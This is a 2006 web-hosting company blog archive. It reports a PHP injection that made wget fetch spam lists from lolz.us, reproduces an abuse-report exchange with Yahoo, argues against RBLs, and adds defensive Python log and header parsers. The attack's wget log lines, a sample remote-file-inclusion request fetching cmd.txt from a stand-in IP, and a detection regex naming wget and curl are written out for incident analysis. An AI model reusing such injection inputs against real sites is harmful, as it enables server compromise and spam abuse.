Archive for June, 2006

Yager missed the Suse desktop reviews in last week's InfoWorld…

http://weblog.infoworld.com/enterprisemac/archives/2006/06/showering_after.html

Clever in the usual Yager style, but I’m going to disagree with him on this hot topic.  I’ll leave it at that for now.


Web.com cries foul

http://news.com.com/2110-1030_3-6085599.html

Watch this one closely…


Yahoo! Inc. — Avoiding the suspension of spammers on their hosting network.

Rarely would I engage a competitor on a public level. However, this situation warrants public notice.

On Sunday, June 11th, 2006, two of the servers on our network contained client-hosted sites that were the victims of PHP injection attacks. Tracing the responsible parties was relatively straightforward: a thorough grep through the relevant Apache logs yielded both the client PHP applications on our servers and the remote sites participating in the attack.

Before I go further, let me be clear in stating that we do not in anyway declare Yahoo! Inc. or any employee of Yahoo! Inc. a participant in spamming or any form of exploitation attack.

That being said, here is what a sample attack yielded from the logs of one of our servers:

Resolving lolz.us... 216.39.58.70, 216.39.58.65, 216.39.58.66, ...
Connecting to lolz.us|216.39.58.70|:80... connected.
--07:15:28-- http://lolz.us/chinez/listb-0012.txt
Resolving lolz.us... 216.39.58.70, 216.39.58.65, 216.39.58.66, ...

We were able to pinpoint this behavior through analysis of the running processes on the server, and further narrowed the malicious processes down to specific environment variables.

The log snippet is a segment of a remote exploit of a PHP application on a client-hosted site on our network (we will be retaining these logs indefinitely). The attacker injected malicious POST variables into a poorly written PHP application, which in turn ran the 'wget' command to pull what we later discovered to be a series of text files containing email addresses from "lolz.us/chinez".
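As an added example, not code from the original post and not Network Redux's own tooling, here is the kind of log triage the paragraphs above describe, in Python. When a PHP script shells out to wget, wget's progress chatter goes to stderr, which Apache captures in error_log; that is why the fetched URLs and the remote host can be pulled straight out of that log. access_log shows the hit on the vulnerable script, but POST bodies are never logged there, so an injected POST variable is invisible and only query-string payloads (remote file inclusion URLs, shell metacharacters) can be flagged. The log lines are constructed to resemble the snippet above; apart from lolz.us and its addresses, every hostname, IP, path and timestamp is invented.

```python
import re
from collections import Counter

# Constructed error_log excerpt (not real data). When a PHP script runs
# system("wget ...") the command's stderr ends up in Apache's error_log,
# which is how the fetches show up. Only lolz.us comes from the post;
# the second file name and the timestamps are invented.
ERROR_LOG = """\
--07:15:28--  http://lolz.us/chinez/listb-0012.txt
Resolving lolz.us... 216.39.58.70, 216.39.58.65, 216.39.58.66, ...
Connecting to lolz.us|216.39.58.70|:80... connected.
HTTP request sent, awaiting response... 200 OK
--07:15:31--  http://lolz.us/chinez/aol/list-003.txt
Resolving lolz.us... 216.39.58.70, 216.39.58.65, 216.39.58.66, ...
[Sun Jun 11 07:16:02 2006] [notice] caught SIGTERM, shutting down
"""

# Constructed access_log excerpt in combined format (not real data). POST
# bodies are not logged, so the injected POST variable is invisible here;
# what is visible is the hit on the script itself and any query-string
# payload (e.g. a remote file inclusion URL).
ACCESS_LOG = """\
192.0.2.10 - - [11/Jun/2006:07:15:27 -0700] "POST /gallery/mailer.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [11/Jun/2006:07:15:29 -0700] "GET /index.php?page=http://203.0.113.9/cmd.txt? HTTP/1.1" 200 2048 "-" "libwww-perl/5.805"
203.0.113.44 - - [11/Jun/2006:07:15:30 -0700] "GET /about.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# wget announces each fetch as "--HH:MM:SS--  URL".
WGET_FETCH = re.compile(r"--\d\d:\d\d:\d\d--\s+(?P<url>https?://(?P<host>[^/\s]+)\S*)")
# Combined-log prefix: client IP, timestamp, request line, status.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Query-string fingerprints of injection: a remote URL as a parameter value,
# shell metacharacters, or a download tool named outright.
SUSPICIOUS_QUERY = re.compile(r"(=https?://|[;|`]|\$\(|\bwget\b|\bcurl\b)", re.I)


def fetched_urls(error_log):
    """Return (host, url) for every file wget reports pulling in error_log."""
    hits = []
    for line in error_log.splitlines():
        m = WGET_FETCH.search(line)
        if m:
            hits.append((m.group("host"), m.group("url")))
    return hits


def remote_hosts(error_log):
    """Count fetched files per remote host: the hosts to report to their operator."""
    return dict(Counter(host for host, _ in fetched_urls(error_log)))


def suspicious_requests(access_log):
    """Flag POSTs to PHP scripts and any request with an injection-like query string."""
    flagged = []
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        path = m.group("path")
        script, _, query = path.partition("?")
        post_to_php = m.group("method") == "POST" and script.endswith(".php")
        if post_to_php or SUSPICIOUS_QUERY.search(query):
            flagged.append((m.group("ip"), m.group("method"), path))
    return flagged


if __name__ == "__main__":
    for host, n in remote_hosts(ERROR_LOG).items():
        print(f"{n} file(s) pulled from {host}")
    for ip, method, path in suspicious_requests(ACCESS_LOG):
        print(f"suspect {method} from {ip}: {path}")
```

The POST-to-any-PHP-script rule is deliberately broad; on a busy host it is a starting point for correlating by client IP and timestamp against the wget fetches in error_log, not a verdict on its own.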

Any intelligent person can only imagine what then transpired — after the spam campaigns and malicious running processes were disabled, we notified the web hosting operator responsible for hosting "lolz.us" (Yahoo! Inc.) and waited for their reply. Clearly the attacks were not originating from Yahoo! Inc. web hosting; rather, the attack was pulling text files from their network containing lists that were clearly being used for the purposes of bulk spamming.
Monday morning rolled in and I received the following message (original message included):

Return-Path:
Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34])
by redux.networkredux.com (8.12.11.20060308/8.12.11) with ESMTP id k5CBI4Pb032453
(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO)
for ; Mon, 12 Jun 2006 04:18:04 -0700
Received: from speedster.cc.kana.corp.yahoo.com (speedster.cc.kana.corp.yahoo.com [207.126.228.28])
by mail-relay1.yahoo.com (8.13.6/8.13.6/mr1) with SMTP id k5CBIn9A053390
for ; Mon, 12 Jun 2006 04:19:00 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; s=serpent; d=yahoo-inc.com; c=nofws; q=dns;
h=date:to:subject:from:reply-to:mime-version:content-type:
content-transfer-encoding:x-mailer;
b=h159P3NmQyaNFvSXoBLy10mdUQbwgN9gHrrFFZq1GMXaNytwjCb1sNJEM2CZp544
Message-Id: <200606121119.k5CBIn9A053390@mail-relay1.yahoo.com>
Date: Mon, 12 Jun 2006 04:18:59 -0700
To: Thomas
Subject: Re: Site hosting mail spam lists (KMM32897062V10993L0KM)
From: Yahoo! Domains
Reply-To: Yahoo! Domains
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: KANA Response 7.0.1.142
X-Spam-Status: No, hits=0.0 required=5.0
tests=none
version=2.55
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp)

Dear Thomas,

Thank you for writing to Yahoo! Domains.

Thank you for informing us of this incident.

Please write back with a more detailed description of the issue in
question and include as much of the following information as you can:

1. The exact and full location of the Yahoo! Domains home page and any
specific file names or HTML pages. (ex: http://www.name_of_domain.com)

2. A detailed description of the complaint or issue.

3. Any other information that may help us investigate and take the
appropriate action.

Please include the requested information in the body of your email
response, and do not send attachments as we are unable to open them.

Additionally, you may want to review the Yahoo! Domains Terms of Service
at:

http://smallbusiness.yahoo.com/tos/tos.php

Thank you again for contacting Yahoo! Customer Care.

Regards,

Sean Philips

Yahoo! Customer Care

http://www.yahoo.com/

23361483

Original Message Follows:
————————-

>>REDFRMADV

The site in question on your services is http://lolz.us/chinez

This url was in our logs as requested for spam lists to generate and
farm.

Regards,

Thomas Brenneke
Network Redux, LLC

I then responded with the following:

Mime-Version: 1.0 (Apple Message framework v746.2)
In-Reply-To: <200606121119.k5CBIn9A053390@mail-relay1.yahoo.com>
References: <200606121119.k5CBIn9A053390@mail-relay1.yahoo.com>
Content-Type: multipart/alternative;
boundary=Apple-Mail-1-26112430
Message-Id:
From: Thomas
Subject: Re: Site hosting mail spam lists (KMM32897062V10993L0KM)
Date: Mon, 12 Jun 2006 12:06:44 -0500
To: Yahoo! Domains

–Apple-Mail-1-26112430
Content-Transfer-Encoding: 7bit
Content-Type: text/plain;
charset=US-ASCII;
delsp=yes;
format=flowed

>
> 1. The exact and full location of the Yahoo! Domains home page and any
> specific file names or HTML pages. (ex: http://www.name_of_domain.com)

http://lolz.us/chinez/

http://lolz.us/chinez/aol/

http://lolz.us/chinez/listb-001.txt (a sample)

Here you will find thousands of email addresses this person has
farmed which he uses to send his unsolicited bulk mailings.

If you do not take this domain down we will have no problem with
informing the federal authorities of the activities going on with a
domain on your network.

> 2. A detailed description of the complaint or issue.

A remote attacker that accessed our network pulled these mailing list
files from the domain on your network to issue a spam campaign from
our network.

I was then greeted with the following:

Return-Path:
Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34])
by redux.networkredux.com (8.12.11.20060308/8.12.11) with ESMTP id k5D2AXHF011958
(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO)
for ; Mon, 12 Jun 2006 19:10:33 -0700
Received: from speedster.cc.kana.corp.yahoo.com (speedster.cc.kana.corp.yahoo.com [207.126.228.28])
by mail-relay1.yahoo.com (8.13.6/8.13.6/mr1) with SMTP id k5D2BPqL004222
for ; Mon, 12 Jun 2006 19:11:30 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; s=serpent; d=yahoo-inc.com; c=nofws; q=dns;
h=date:to:subject:from:reply-to:mime-version:content-type:
content-transfer-encoding:x-mailer;
b=Phlb2vuaKvyztnbaO0zlJWEVf6Idce5SOv2TR/b8O65Ge6iGeAw94b+KQET3OXYV
Message-Id: <200606130211.k5D2BPqL004222@mail-relay1.yahoo.com>
Date: Mon, 12 Jun 2006 19:11:29 -0700
To: Thomas
Subject: Re: Site hosting mail spam lists (KMM32925908V64510L0KM)
From: Yahoo! Domains
Reply-To: Yahoo! Domains
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Mailer: KANA Response 7.0.1.142
X-Spam-Status: No, hits=0.8 required=5.0
tests=QUOTED_EMAIL_TEXT,SUBJ_HAS_UNIQ_ID
version=2.55
X-Spam-Level:
X-Spam-Checker-Version: SpamAssassin 2.55 (1.174.2.19-2003-05-19-exp)

Dear Thomas,

Thank you for writing to Yahoo! Domains.

Thank you for informing us of possible abuse on Yahoo! Domains. We have
investigated the site and taken the necessary action. Please continue to
notify us of any content you believe violates the Yahoo! Domains Terms
of Service, located at:

http://smallbusiness.yahoo.com/tos/tos.php

Thank you again for contacting Yahoo! Customer Care.

Regards,

Harold Quincy

Yahoo! Customer Care

http://www.yahoo.com/

23361483

I then attempted to view the previously discussed URLs/files in question. To my dismay, they were still very much present, and still being hosted by Yahoo! Inc. web hosting services.

At this point, it appears the only way to get this site disabled is to make a little bit of public noise, as the abuse department of Yahoo! Inc. web hosting is apparently unable to comprehend the malicious nature of this site in question.

Attached: Screen shots as of 8:44PM PST June 12th, 2006.

[Screen Shot 1, Screen Shot 2, Screen Shot 3: Yahoo]


An argument against the usage of RBLs

A scenario that occurs frequently is reason enough to avoid SpamCop or a similar service in your spam-fighting campaigns…

Take a random user on our network. This user has a standard domain hosted on our servers, which includes email services (POP3/IMAP/forwarders, etc.). This user also has an email address with their ISP, which they use as their primary mailbox.

In turn, this user has their @domain.com mailboxes with our hosting services forwarded to their @ISP mailbox.

A spam message destined for a mailbox @domain.com in turn gets forwarded to their @ISP mailbox. The user, unaware of the path it took, sees this as generic spam and reports it to their ISP as well as to other organizations such as SpamCop.

A careful look at the email headers will show that the spam message came from a specific sender, was then relayed through the Network Redux server, and then landed in the user's @ISP mailbox.

SpamCop and AOL, as examples, do not detect or take into account the difference between an open relay and a mail forwarding service. As a result, not only will the sender be listed; the Network Redux server is listed as well.

As a web hosting provider we deal with this nonsense on a weekly basis, and there is very little that can be done about it.

Network and email administrators should be wary of using RBLs in conjunction with mail delivery, as they are prone to false positives as a result of the way these services trace the source of spam.
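The header walk described above, as an added example in Python that is not code from the original post: it parses the Received chain of a constructed spam message that entered redux.networkredux.com for a hosted domain and was forwarded to the user's ISP mailbox, and shows why a reporter that only looks at the host that delivered to the final MX blames the forwarder, while a walk that treats the forwarder as a trusted hop reaches the real sender. The ISP hostname, the sender's host, every IP address and the message IDs are invented.

```python
import re

# Constructed headers (not a real message). The spam was accepted by
# redux.networkredux.com for sales@domain.com, forwarded to the user's ISP
# mailbox, and stamped by the ISP's MX on the way in. Most recent hop first,
# as in a real message. The ISP hostname, the sender's host and every IP
# are invented.
SAMPLE_HEADERS = """\
Received: from redux.networkredux.com (redux.networkredux.com [192.0.2.25])
    by mx1.example-isp.net (Postfix) with ESMTP id 7A3F1C2
    for <user@example-isp.net>; Sun, 11 Jun 2006 07:20:12 -0700
Received: from dsl-203-0-113-5.example.net (dsl-203-0-113-5.example.net [203.0.113.5])
    by redux.networkredux.com (8.12.11.20060308/8.12.11) with SMTP id k5BEK9ab012345
    for <sales@domain.com>; Sun, 11 Jun 2006 07:20:09 -0700
From: "Great Offers" <offer@bogus.example>
To: sales@domain.com
Subject: cheap pills
"""

# "from <helo> (<rdns> [<ip>]) ... by <host>" as written by sendmail/Postfix.
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)(?:\s+\((?P<info>[^)]*)\))?.*?\bby\s+(?P<by>\S+)", re.S
)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def unfold(raw):
    """Join RFC 2822 continuation lines (leading whitespace) onto their header."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines


def received_chain(raw):
    """Received hops, most recent first: connecting host, its stamped IP, receiving host."""
    hops = []
    for line in unfold(raw):
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "received":
            continue
        m = RECEIVED_RE.search(value)
        if not m:
            continue
        ip = IP_RE.search(m.group("info") or "")
        hops.append({
            "from": m.group("helo").lower(),
            "ip": ip.group(1) if ip else None,
            "by": m.group("by").lower(),
        })
    return hops


def delivering_host(raw):
    """The IP that handed the message to the final MX: what a naive report blames."""
    chain = received_chain(raw)
    return chain[0]["ip"] if chain else None


def originating_host(raw, trusted):
    """Walk the chain top-down through hosts in `trusted` (the recipient's own MX
    and any forwarders it recognises). The first hop stamped by a trusted host
    but connecting from an untrusted one is where the mail entered. Stamps made
    by untrusted hosts are ignored, since a sender can forge the lines below its
    own hop."""
    trusted = {h.lower() for h in trusted}
    for hop in received_chain(raw):
        if hop["by"] not in trusted:
            break  # past the trusted boundary; the remaining hops may be forged
        if hop["from"] not in trusted:
            return hop["ip"]
    return None


if __name__ == "__main__":
    print("naive report blames:", delivering_host(SAMPLE_HEADERS))
    print("ISP MX only trusted:", originating_host(SAMPLE_HEADERS, {"mx1.example-isp.net"}))
    print("forwarder recognised:", originating_host(
        SAMPLE_HEADERS, {"mx1.example-isp.net", "redux.networkredux.com"}))
```

The walk stops at the first hop not stamped by a trusted host because everything below that line is under the sender's control; that is also why a list operator that does not know redux.networkredux.com is a forwarder has no safe way to look past it, and lists it.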
